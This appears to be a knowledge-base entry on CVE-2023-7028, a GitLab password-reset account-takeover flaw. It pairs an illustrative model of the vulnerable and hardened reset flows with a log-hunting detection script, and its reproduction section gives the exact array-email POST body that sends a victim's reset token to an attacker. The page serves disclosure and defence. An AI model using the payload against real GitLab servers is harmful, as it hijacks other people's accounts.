Knowledge Base

CVE-2023-7028

Updated 26 May 2026

Background

Password Reset Account Takeover

CVSS
  10.0 Critical
VECTOR
  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
IMPACT
  Account takeover
AFFECTED
  GitLab CE/EE 16.1 < 16.1.6
  GitLab CE/EE 16.2 < 16.2.9
  GitLab CE/EE 16.3 < 16.3.7
  GitLab CE/EE 16.4 < 16.4.5
  GitLab CE/EE 16.5 < 16.5.6
  GitLab CE/EE 16.6 < 16.6.4
  GitLab CE/EE 16.7 < 16.7.2

A vulnerability in self-managed GitLab Community Edition (CE) and Enterprise Edition (EE) allows account takeover through password reset emails sent to unverified addresses. The flaw was introduced in 16.1.0, when GitLab began allowing password resets through a user's secondary email address. By supplying an array of email addresses in the password reset request, an attacker who knows one address registered to the target account can have the reset token delivered to an address they control, with no verification of that address and no interaction from the victim. Accounts with two-factor authentication enabled can still have their password reset this way, but the attacker cannot complete a login without the second factor.
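The following is an added example, not GitLab's code, that models the mechanism described above: Rack-style form parsing turns the bracketed keys into a nested structure, so a field the application expects to be one string arrives as an array; a handler whose lookup tolerates a list and which passes the raw parameter to the mailer then sends the victim's token to every address in it. The user table, the mailer, and the two handlers are constructed for illustration (the hardened variant is one defensive pattern, not the actual GitLab patch):

```python
import re
import secrets
from urllib.parse import parse_qsl

# The body from the reproduction section of this page.
POC_BODY = "user[email][]=valid@email.com&user[email][]=attacker@email.com"

# Constructed stand-in for the users table: only the victim's account exists.
USERS = {"valid@email.com": {"id": 1, "username": "victim"}}


def parse_nested_query(body: str) -> dict:
    """Rack-style nested form parsing:
    a[b]=x   -> {'a': {'b': 'x'}}
    a[b][]=x -> {'a': {'b': ['x']}}
    Rails performs the same expansion before the controller sees the parameters,
    which is why the client alone can promote a string field to an array.
    """
    result: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        parts = [key.split("[", 1)[0]] + re.findall(r"\[([^\]]*)\]", key)
        node = result
        for i, part in enumerate(parts):
            nxt = parts[i + 1] if i + 1 < len(parts) else None
            if nxt is None:                       # leaf: plain scalar value
                node[part] = value
            elif nxt == "":                       # trailing [] means "append to a list"
                node.setdefault(part, []).append(value)
                break
            else:                                 # intermediate hash level
                node = node.setdefault(part, {})
    return result


class Mailer:
    """Records deliveries; like a typical Rails mailer's `to:`, it accepts a list."""

    def __init__(self) -> None:
        self.sent: list[tuple[str, str]] = []

    def deliver(self, to, token: str) -> None:
        for recipient in (to if isinstance(to, list) else [to]):
            self.sent.append((recipient, token))


def _email_param(params: dict):
    user = params.get("user")
    return user.get("email") if isinstance(user, dict) else None


def vulnerable_reset(params: dict, mailer: Mailer):
    """Flawed flow: the lookup tolerates a list (as `where(email: [...])` becomes
    SQL IN) and the unvalidated parameter is handed straight to the mailer."""
    email = _email_param(params)
    candidates = email if isinstance(email, list) else [email]
    user = next((USERS[e] for e in candidates if e in USERS), None)
    if user is None:
        return None
    token = secrets.token_urlsafe(16)
    mailer.deliver(email, token)              # every address in the array gets the token
    return token


def hardened_reset(params: dict, mailer: Mailer):
    """Defensive pattern: require a single string and mail only the address
    that identified the account. Illustrative, not GitLab's fix."""
    email = _email_param(params)
    if not isinstance(email, str):            # arrays and hashes are rejected outright
        return None
    user = USERS.get(email)
    if user is None:
        return None
    token = secrets.token_urlsafe(16)
    mailer.deliver(email, token)
    return token


def recipients_for(handler, body: str) -> list[str]:
    """Run a handler on a raw form body and return who received a reset token."""
    mailer = Mailer()
    handler(parse_nested_query(body), mailer)
    return sorted(addr for addr, _ in mailer.sent)


if __name__ == "__main__":
    print("vulnerable:", recipients_for(vulnerable_reset, POC_BODY))
    print("hardened:  ", recipients_for(hardened_reset, POC_BODY))
```

Run against the PoC body, the vulnerable handler mails both `valid@email.com` and `attacker@email.com`, while the hardened one refuses the request because the parameter is not a single string. The same type check belongs in front of any lookup-by-parameter that feeds a side effect (mail, SMS, webhook), since mass-assignment parsers will expand arrays and hashes wherever the client asks.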

Reproduction

POC || GTFO

Send the following form-encoded body in a POST to the password reset endpoint (on a stock install this is the Devise route /users/password). The first address must belong to an existing account; the reset email, with its token, is delivered to every address in the array, including the attacker's:

```http
user[email][]=valid@email.com&user[email][]=attacker@email.com
```
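To check whether an instance was targeted, the request above leaves a distinctive trace: a POST to /users/password whose `user.email` parameter is an array rather than a string. The script below is an added example (not GitLab tooling) that hunts for that pattern in `gitlab-rails/production_json.log`. The sample lines are constructed, and the field layout (a `params` list of `{"key", "value"}` objects alongside `method`, `path`, `remote_ip` and `time`) is assumed to match that log's format:

```python
import json

# Constructed production_json.log lines (not real data): one legitimate
# reset, one CVE-2023-7028 attempt, one unrelated request and one junk line.
SAMPLE_LOG = "\n".join([
    json.dumps({"time": "2024-01-12T09:58:01.000Z", "method": "GET", "path": "/users/sign_in",
                "params": [], "remote_ip": "198.51.100.7", "status": 200}),
    json.dumps({"time": "2024-01-12T09:59:30.000Z", "method": "POST", "path": "/users/password",
                "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                           {"key": "user", "value": {"email": "valid@email.com"}}],
                "remote_ip": "198.51.100.7", "status": 302}),
    json.dumps({"time": "2024-01-12T10:00:00.000Z", "method": "POST", "path": "/users/password",
                "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                           {"key": "user", "value": {"email": ["valid@email.com", "attacker@email.com"]}}],
                "remote_ip": "203.0.113.5", "status": 302}),
    "this line is not JSON and must be skipped",
])


def param_value(entry: dict, key: str):
    """Look a request parameter up in the log entry's params list."""
    for p in entry.get("params") or []:
        if isinstance(p, dict) and p.get("key") == key:
            return p.get("value")
    return None


def reset_email_param(entry: dict):
    """Return the email value of a password-reset POST, or None for any other request."""
    if entry.get("method") != "POST" or entry.get("path") != "/users/password":
        return None
    user = param_value(entry, "user")
    return user.get("email") if isinstance(user, dict) else None


def hunt(log_text: str) -> list[dict]:
    """Flag reset requests whose email parameter arrived as an array.

    The real form sends a single string, so any array means the body was
    crafted; more than one address is the account-takeover signature.
    """
    hits = []
    for line in log_text.splitlines():
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue                              # rotated/partial lines are not JSON
        email = reset_email_param(entry)
        if isinstance(email, list):
            hits.append({
                "time": entry.get("time"),
                "remote_ip": entry.get("remote_ip"),
                "emails": email,
                "multi": len(email) > 1,
            })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

Feed it the real log (`python3 hunt.py < production_json.log` after swapping `SAMPLE_LOG` for stdin) and treat any hit as an incident: reset the affected accounts' passwords and credentials, and review tokens and keys they own. GitLab's advisory also points at `gitlab-rails/audit_json.log` entries from `PasswordsController#create` whose `target_details` is an array of addresses; the same array check applies there.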